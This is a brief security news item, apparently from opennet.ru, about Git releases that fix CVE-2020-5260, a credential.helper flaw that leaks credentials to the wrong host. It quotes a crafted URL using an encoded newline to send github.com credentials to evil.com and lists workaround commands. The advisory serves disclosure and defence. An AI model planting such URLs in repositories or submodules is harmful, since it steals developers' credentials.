Git credential leak vulnerability

Corrective releases of the distributed source control system Git have been published: 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 and 2.17.4. They fix a vulnerability (CVE-2020-5260) in the "credential.helper" handler that causes credentials to be sent to the wrong host when a git client accesses a repository through a specially crafted URL containing a newline character. The vulnerability can be used to have credentials belonging to another host sent to a server controlled by the attacker.

When a URL such as "https://evil.com?%0ahost=github.com/" is specified, the credential handler, while connecting to the host evil.com, will pass the credential parameters set for github.com. The problem occurs during operations such as "git clone", including the processing of submodule URLs (for example, "git submodule update" automatically processes the URLs specified in the repository's .gitmodules file). The vulnerability is most dangerous in situations where the developer clones a repository without seeing the URL, for example when working with submodules, or in systems that perform automatic actions, for example package build scripts.

To block the vulnerability, the new versions forbid passing a newline character in any value transmitted through the credential exchange protocol. For distributions, the release of package updates can be tracked on the pages of Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.

As a workaround, it is recommended not to use the credential helper. To disable the credential.helper handler completely, which saves and retrieves passwords from a cache, protected stores or a password file, you can use the commands:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Source: opennet.ru
